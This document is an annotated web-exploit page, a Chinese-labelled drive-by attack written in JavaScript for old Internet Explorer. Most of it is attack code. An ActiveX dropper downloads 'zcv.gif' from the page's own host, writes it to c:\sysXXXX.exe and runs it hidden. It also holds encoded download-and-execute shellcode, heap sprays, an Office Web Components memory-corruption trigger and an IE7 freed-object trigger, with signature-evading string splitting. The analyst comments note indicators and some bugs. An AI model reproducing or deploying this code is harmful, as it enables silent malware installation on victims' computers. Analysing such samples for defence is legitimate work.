zcv.gif 是这个网马下载并执行的载荷（脚本把它保存为 c:\sysXXXX.exe 后运行，并非真正的图片）；这种下载执行型 shellcode 很久以前就出现过。
<html>
<body><div id="DivID">x</div>
<script>
// Resolves `url` against the directory of the current page: everything in
// document.location.href up to (not including) its last '/', then "/" + url.
// MD2C() uses this to fetch the second stage "zcv.gif" from the same
// directory as this HTML file, so dropper and payload are always co-hosted.
function insertURL2(url){
var res = "";
res = document.location.href.substr(0,document.location.href.lastIndexOf('/')) + "/" + url;
return res;
}
// Splices the page-relative URL of `url` into the %uXXXX shellcode string.
//   shellcode - the "%u...." encoded stub (the `c` literal below)
//   ioffset   - splice point; the first ioffset*3 CHARACTERS of `shellcode`
//               are copied (3 at a time), i.e. this is a character offset,
//               not a count of %u units
//   url       - payload name, resolved against the page directory exactly
//               as insertURL2() does
// The URL is re-encoded as little-endian 16-bit units ("%u" + second byte +
// first byte, via charCodeAt().toString(16)) so that after unescape() it
// sits in memory as a plain ASCII string the stub can pass to wininet.
// Analyst notes: toString(16) is not zero-padded, so a character below 0x10
// would corrupt the encoding; for an odd-length URL the last
// url.substr(i+1,1) is "" and charCodeAt(0) is NaN, yielding a "%uNaN.."
// unit. The loop index `i` is an implicit global shared with the whole file.
function insertURL(shellcode, ioffset, url){
var res = "";
var resurl = "";
// copy the stub up to the splice point
for(i=0;i<ioffset*3;i+=3){
res += shellcode.substr(i,3);
}
url = document.location.href.substr(0,document.location.href.lastIndexOf('/')) + "/" + url;
// encode the URL two characters per 16-bit unit, low byte first
for(i=0;i<url.length;i+=2){
var b1 = url.substr(i,1).charCodeAt(0).toString(16);
var b2 = url.substr(i+1,1).charCodeAt(0).toString(16);
resurl += "%u" + b2 + b1;
}
res += resurl;
// copy the remainder of the stub after the splice point
for(i=ioffset*3;i<shellcode.length;i+=3){
res += shellcode.substr(i,3);
}
return res;
}
// Returns `len` pseudo-random lowercase letters drawn from a 25-letter
// alphabet (note that 'j' is missing). Its only caller is MD2C(), which names
// the dropped file "c:\sys" + GetRandString(4) + ".exe", so the on-disk
// artifact matches c:\sys[a-ik-z]{4}.exe. Math.random() is used, so the
// name is predictable in principle but varies per victim.
function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
// Instantiates a COM object through an <object> element. Despite its name,
// `CLSID` is the DOM element MD2C() created with its classid attribute set;
// `name` is a ProgID such as "msxml2.XMLHTTP". Six call shapes of
// CreateObject()/GetObject() are tried via eval() in turn, every exception
// swallowed, until one returns a non-null object. Returns that object or
// null. The `s=1` assignments create an implicit global that nothing reads.
function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
// Synchronous GET of `url` through the XMLHTTP object obtained from
// CreateObject(). Returns the raw `responseBody` (the IE-specific
// binary-safe response property; MD2C() writes it straight to a .exe) or 0
// if open()/send() throws. A 0 return is the caller's only failure signal.
function XMLHttpDownload(xml, url) {
try {
xml.open("GET", url, false);
xml.send(null);
} catch(e) { return 0; }
return xml.responseBody;
}
// Writes `data` (the downloaded responseBody) to the path `name` using an
// ADODB.Stream object `o`. Per the ADO constants, Type = 1 is adTypeBinary,
// Mode = 3 is adModeReadWrite and SaveToFile(name, 2) is
// adSaveCreateOverWrite, so any existing file at `name` is replaced.
// Returns 1 on success, 0 if any step throws; failures are silent.
function AD2BDStreamSave(o, name, data) {
try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }
return 1;
}
// Launches the dropped file `name`. `exec` is the shell object MD2C() found
// and `type` is its `n` flag: 0 means WScript.Shell, so Run(name, 0) starts
// the program with a hidden window; any other value means Shell.Application
// and ShellExecute(name) is used. Returns 1 if a launch call returned
// without throwing, else 0.
// Analyst note: the else branch references `exe`, but the parameter is
// `exec`; `exe` is undefined, so as written that branch always throws into
// its catch and returns 0.
function ShellExecute(exec, name, type) {
if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}
return(0);
}
// Download-and-execute dropper that needs no memory corruption: it relies on
// the browser handing out scriptable COM objects. It walks a list of CLSIDs
// (each split with '+' so the GUID never appears whole in the source, a
// signature-evasion trick), creates an <object> per CLSID and uses it to
// obtain three helpers: an XMLHTTP object (v[0]), an ADODB.Stream (v[1]) and
// a shell object (v[2]; `n` becomes 1 when Shell.Application was used instead
// of WScript.Shell). With all three it fetches "zcv.gif" from the page's
// directory, writes it to c:\sysXXXX.exe and runs it. Returns 1 on success,
// 0 otherwise.
// Analyst notes:
//  - Indicators: the CLSID list below, the ProgIDs msxml2.XMLHTTP /
//    Microsoft.XMLHTTP / MSXML2.ServerXMLHTTP / ADODB.Stream / WScript.Shell /
//    Shell.Application, the request for zcv.gif, and the c:\sys[a-z]{4}.exe
//    drop path.
//  - As written, `t.substring(...)` is applied to the Array `t` itself rather
//    than to an element; the resulting TypeError is caught and `a` stays
//    null, so nothing is ever instantiated, and because `i` is never used to
//    index `t` the while loop has no exit condition that can become true.
//    This listing therefore looks like a modified copy rather than the
//    byte-exact working sample.
function MD2C() {
// CLSIDs, concatenated from fragments to defeat naive string matching
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
// v[0] = HTTP client, v[1] = binary stream writer, v[2] = shell launcher
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
// absolute URL of the second stage, served next to this page
var urlRealExe = insertURL2('zcv.gif');
while (t && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;
try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t.substring(1, t.length - 1));
} catch(e) { a = null; }
if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}
if (! v[1]) {
v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam");
}
if (! v[2]) {
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2]) {
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
// n selects the launch API in ShellExecute(): 1 = Shell.Application
if (v[2]) n=1;
}
}
}
i++;
}
if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
// dropped-file artifact: c:\sys + 4 random letters + .exe
var name = "c:\\sys"+GetRandString(4)+".exe";
if (AD2BDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}
return ret;
}
// Stage-1 shellcode as a %uXXXX string (little-endian 16-bit units). Decoding
// the ASCII embedded in it shows the API names the stub resolves by hand:
// GlobalAlloc, LoadLibraryA, wininet, InternetOpenA (user agent
// "Mozilla/4.0"), InternetOpenUrlA, InternetReadFile, GetTempPathA,
// CreateFileA, WriteFile, CloseHandle, WinExec, ExitProcess -- a classic
// download-to-temp-and-WinExec stub fetching the same second stage that
// MD2C() drops without shellcode. The long run of %u0000 at the end is
// padding; the URL is spliced in by insertURL() at character offset 548*3.
var c="%u00e8%u0000%u5d00%ued81%u1116%u0040%uc029%u0364%u3040%u408b%u8b0c%u1c70%u8bad%u0870%uac56%u8b3c%ufb75%u3e80%u757d%u83f6%u03c6%u3dad%uffff%u0000%ueb75%uee83%u5b11%u0ce8%u0000%u4700%u6f6c%u6162%u416c%u6c6c%u636f%u5300%ud6ff%u0068%u1000%u6a00%uff40%u50d0%u0de8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%uff53%ue8d6%u0008%u0000%u6977%u696e%u656e%u0074%ud0ff%u5050%u0ee8%u0000%u4900%u746e%u7265%u656e%u4f74%u6570%u416e%u5000%ud6ff%u006a%u006a%u006a%u016a%u0ce8%u0000%u4d00%u7a6f%u6c69%u616c%u342f%u302e%uff00%u5ad0%ue850%u0011%u0000%u6e49%u6574%u6e72%u7465%u704f%u6e65%u7255%u416c%u5200%ud6ff%u8d5a%u358d%u4013%u9000%ue890%u0103%u0000%u006a%u0068%u0000%u6a80%u6a00%u5100%uff52%u59d0%ue850%u0011%u0000%u6e49%u6574%u6e72%u7465%u6552%u6461%u6946%u656c%u5100%ud6ff%u8d59%uff95%u4012%u5f00%u6852%u0000%u0010%u5157%ud0ff%u0de8%u0000%u4700%u7465%u6554%u706d%u6150%u6874%u0041%uff53%u8dd6%u0395%u4013%u5200%u6a52%uff50%u5ad0%u04c6%u3102%u0ce8%u0000%u4300%u6572%u7461%u4665%u6c69%u4165%u5300%ud6ff%u958d%u1303%u0040%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6802%u0000%u4000%uff52%u50d0%ue850%u000a%u0000%u7257%u7469%u4665%u6c69%u0065%uff53%u5ad6%u8b56%uff8d%u4012%u8d00%ufbb5%u4012%u6a00%u5600%u5751%uff52%u5ed0%u0ce8%u0000%u4300%u6f6c%u6573%u6148%u646e%u656c%u5300%ud6ff%ud0ff%u08e8%u0000%u5700%u6e69%u7845%u6365%u5300%ud6ff%ubd8d%u1303%u0040%u016a%uff57%ue8d0%u000c%u0000%u7845%u7469%u7250%u636f%u7365%u0073%uff53%uffd6%u60d0%uce89%u3cac%u7500%u4efb%uc64e%u6606%u46c6%u0001%uc361%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000";
// patch the absolute URL of zcv.gif into the stub, then decode to raw UTF-16
c=unescape(insertURL(c,548,'zcv.gif'));
// Heap spray for the non-IE7 branch: blocks of 0x100000 characters minus the
// shellcode and a 0x1020 allowance (presumably for string/heap headers),
// filled with 0x0C0C0C0C so that a hijacked pointer of 0x0C0C0C0C lands in
// the filler and slides into `c`.
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
// `delete` on a var-declared binding is a no-op in JScript/JS
delete b;
// Analyst note: this assigns the same variable 0xC0 times instead of
// array[i] = ..., so only the last string is referenced by `array`; whatever
// spray density was intended is not what this listing produces.
for(i=0; i<0xC0; i++) {
array = lh + c;
}
// JScript-only: force a collection so freed/allocated blocks settle
CollectGarbage();
// 0x0b0b0b0b followed by 25 'A's; used as <img>.src filler in ok()
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
// 1000 detached <img> elements for the IE7 branch (ok())
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
// Second trigger, scheduled every 4 s on both browser branches. Re-sprays the
// heap with 0x0b0c0b0c-filled strings (two filler blocks plus the shellcode
// per iteration, 0x99*2 = 306 iterations, block length 0x81000 minus the
// shellcode), then instantiates the "OWC10.Spreadsheet" ActiveX control,
// calls Evaluate() repeatedly with an array whose last element is the
// `window` object, forces e[3] (window) through string conversion via
// window.status, and finally calls msDataSourceObject(e[3]) ten times. Every
// control call is wrapped in try/catch so errors never surface.
// Analyst notes: the Evaluate()/msDataSourceObject() pair matches the
// publicly reported Office Web Components memory-corruption vector -- confirm
// against the vendor advisory before tagging a sample with a specific CVE.
// `e`, `i` and `j` are implicit globals (no var), the catch(e) parameter
// shadows the array `e` only inside the catch body, and as in the outer
// spray `array = ...` overwrites one variable rather than filling an array.
function word_()
{
var array = new Array();
var ls = 0x81000-(c.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{
bigblock+=bigblock;
}
var lh = bigblock.substring(0,ls/2);
// no-op on a var-declared binding
delete bigblock;
for(i=0;i<0x99*2;i++)
{
array = lh + lh + c;
}
CollectGarbage();
// indicator: OWC10.Spreadsheet ProgID instantiated from script
var obj = new ActiveXObject("OWC10.Spreadsheet");
e=new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for(i=0;i<e.length;i++)
{
for(j=0;j<10;j++)
{
try
{ obj.Evaluate(e);
} catch(e) {}
}
}
// coerces the window object to a string; the result itself is unused
window.status=e[3] +'';
for(j=0;j<10;j++)
{
try
{
obj.msDataSourceObject(e[3]);
} catch(e) {}
}
}
// IE7-branch trigger. Creates a <tbody>, reads .click without calling it
// (a property read, not a click), clones the node, strips the original's
// attributes with clearAttributes(), drops the only reference and forces a
// collection with CollectGarbage(), then reuses freed memory by pointing all
// 1000 <img> elements in `a1` at the s1 string (0x0b0b0b0b + "A"*25), and
// finally touches .click on the clone. The shape is a freed-object reuse
// attempt against the DOM; the specific underlying IE bug is not identified
// anywhere in this listing, so do not attribute it without further analysis.
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
// refill freed memory with the attacker-controlled string
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
// Entry point. navigator.userAgent is checked for "msie 7": any other browser
// gets the ActiveX dropper MD2C() followed by the OWC trigger; IE7 gets the
// DOM trigger ok() followed by the same OWC trigger. Both branches pass a
// code STRING to SetInterval, i.e. eval-style execution of "word_()" every
// 4000 ms.
// Analyst note: the DOM API is `setInterval` (lowercase). JScript identifiers
// are case-sensitive, so `SetInterval` as printed would raise a
// ReferenceError once MD2C()/ok() returns -- a further sign that this listing
// is not the byte-exact sample that was deployed.
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
{
MD2C();
SetInterval("word_()",4000);
}
else
{
ok();
SetInterval("word_()",4000);
}
</script>
</body>
</html>